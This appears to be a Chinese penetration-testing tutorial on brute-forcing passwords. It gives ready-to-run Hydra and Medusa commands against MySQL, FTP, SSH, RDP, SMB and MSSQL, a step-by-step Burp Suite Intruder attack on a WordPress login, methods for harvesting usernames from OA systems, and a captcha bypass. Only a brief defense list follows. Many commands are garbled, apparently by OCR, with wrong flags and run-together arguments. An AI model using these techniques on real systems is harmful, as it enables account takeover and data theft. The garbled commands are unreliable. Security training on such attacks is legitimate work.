暴力破解也被称为枚举测试、穷举法测试,是一种针对密码破译的方法,即:将密码逐个比较,直到找出真正的密码为止。
C/S架构破解
SQL Server
Hydra目前支持的破解服务有: FTP、 MSSQL、MYSQL、POP3、 SSH等。通过Nmap扫描主机,可以发现主机192.168.1.110开放了1433 端口,一~般SQL Server数据库端口即为1433。进一步可以通过Namp-A参数确定服务器到底是否运行SQLServer服务
(1)破解MySQL密码
hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql
使用-L指定用户名文件,_P 指定密码文件。
(2)破解FTP密码
Hydra.exe -l admin -Pc: \pass.txt -t 5 192.168.1.110 ftp
使用-1指定用户名,-t 指定线程。
(3)破解ssh
hydra.exe -I users.txt -P password.txt-e n -t 5 -vV 192.168.1.110ssh
使用“-e n” 对空密码探测。
(4)破解rdp
hydra.exe -1 administrator -P c:\pass.txt www.xxser.com rdp -V
破解www.xxser.com的rdp服务,即远程桌面协议。
(5)破解pop3
hydra.exe -1 root -P pass. txt my.pop3 .mail pop3未指定文件路径时,Hydra 将会在本目录下查找文件。
攻击者一旦得到数据库密码,一 般会做两件事情,一是“拖库",二是“提权”。如果提权成功,就相当于有了这台计算机的root权限,可以说“想做什么就做什么”。
MySQL
Madusa
关键特性
基于线程的并行测试,可同时对多台主机进行测试。
模块化设计,每个服务模块作为一个独立的mod文件存在。
可以灵活地输入目标主机信息和测试指标。
-d查看可利用模块
-M模块-q显示指定模块帮助信息
基本语法为:“Medusa主机名用户名密码-M模块”
①破解smbnt。
medusa -h www. secbug.org -u administrator -P /pass.txt -e ns -M smbnt
使用“-h”参数对主机www.secbug.org破解smbnt服务,并使用“-e ns” 参数,尝试空密码及账号为密码。
②破解MSSQL。
medusa -h 192.168.1.110 -u sa -P /pass. txt -t 5 -f -M mssql
使用“-t”参数指定线程,“-f”指定在任何主机上找到了第1个账号/密码后,停止审计。
③使用“_C”参数破解smbnt。
medusa -M smbnt -C combo. txt
使用“_C”参数破解smbnt, combo 文件的格式如下:
192.168.0.20:administrator :password192.168.0.20: testuser:pass
192. 168.0.30:administrator :blah192.168.0.40:user1 : foopass
④破解SSH。
medusa -M ssh -H host.txt -U users.txt -P password使用“_U”参数读取用户名字典文件users.txt。
⑤日志信息。
medusa -h 192.168.1.110 -u sa -P /pass.txt -t 5 -f -e ns -M mssq1 -0 /ap. txt将成功的信息记录到“/ap.txt” 文件中,记录格式如下:# Medusa v.2.0 (2013-07-12 05:31:40)
# medusa -h 192.168.1.110 -u sa -P /pass.txt -t 5一f -e ns -M mssql -0 /ap. txtACCOUNT FOUND: [mssql] Host: 192. 168.1.110 User: sa Password: pwd0123 [SUCCESS]# Medusa has finished (2013-07-12 05:32:01) .
B/S架构破解
burpsuite
攻击者在破解表单之前,一般会先寻找一个标志位,也就是登录成功与失败的区别点
第一步:获取设置循环变量。
使用账户为“admin”、 密码为"admin” 登录,并将其载入到Burp Suite Intruder 模块,在POST请求中,我们看到了“pwd= admin”。顾名思义,这是密码参数,然后在“admin”的位置设置变量&pwd=8admin8。
第二步:设置Payload.
设置好变量信息之后,开始设置密码字典,选择“PayLoad” 选项卡,在“Payload set”→“Payload type”下拉框中选择“Simple list",意为简单列表,然后在“Payload Option”区域单击“Add”按钮载入字典。
第三步:设置标识位。
选择“Option”→“Grep - Match”设置标识位,单击“Clear”按钮将列表框中的关键字清空,接着在输入框中输入“rememberme",然后单击“Add”按钮添加关键字。在下面的“Matchtype”匹配类型中提供了两种匹配方式,一种是简单的字符串匹配,另一种 是正则表达式匹配,这里选择“Simplestring”简单字符串匹配即可。
最后,单击“Flag result items with responses matching where expression”选择框,然后选择“Intruder”→“Start attack”开始暴力猜解。
第四步:寻找破解后的密码。
攻击者将“rememberme"字符串作为标识位,这表示如果破解失败,标识位肯定是存在的,如果破解成功,标志位是没有的。如果字典较大,条目就会很多,很难快速寻找成功的条目,这里可以用到Burp Suite的排序功能,单击标识位列头,即可排序,排序后就可以很快寻找到破解成功的条目。在排序后可以看到密码为“pwd@123” 的条目并没有被标识,返回文本长度不同,而且HTTP状态码也与其他条目不一-样,这样就基本确定“pwd@123”就是管理员的密码。
这种方法不仅可以破解WordPress账户信息,也同样适用于任何没有采取防护措施的Web应用程序。
像WordPress这类开源且使用用户居多的系统,很多安全研究者早已写好了特定的暴力破解程序,在测试时,直接使用即可,如: WpScan。
暴力破解应用
1.攻击OA系统
在破解OA系统时,要考虑破解速度的问题。OA系统往往与数据库、FTP、RDP、CMS这类不一-样,很多时候,OA没有内置“ROOT.SA、Administrator. admin"这类默认用户,即使存在,也只能猜测出一两个默认用户, 所以这时搜集用户名就成了重点。
在搜集用户名的时候,一般会采用以下两种手段。
(1)通过邮箱搜集
通过Google hack使用搜索引擎查找
(2)通过错误提示搜集
通过不同的错误提示消息,攻击者可以针对系统先暴力破解用户名,再暴力破解密码。
搜集完用户名之后,攻击者就可以对密码进行暴力破解了,攻击者的密码字典一般都会采取100~300个数量的高命中率弱口令,如果在这些弱口令密码中破解不成功,那么密码就可能较复杂,破解的效率就会大大降低。
2.破解验证码
暴力破解验证码经常出现在密码找回、修改密码、交易支付等操作。
防止暴力破解
1.密码的复杂性
2.验证码措施
从渗透测试的角度来说,验证码还有另一种破解方式: 客户端使用标签访问验证码生成函数或类,然后验证码函数生成字符串,保存在SESSION中,并且生成图片文件发送给前台的
标签显示,用户看到验证码并输入验证码提交之后,用户输入的验证码将会与SESSION中的字符串相比较,如果验证结果相等,证明是正确的验证码,否则是错误的。
有些程序员在对比验证码之后,没有刷新SESSION,而是返回到客户端之后,由标;签发起访问再次生成验证码,这样就导致了客户端如果不解析
标签,验证码就不会发生改变,从而使验证码“无效”,这样就可以轻松绕过验证码。
3.登录日志(限制登录次数)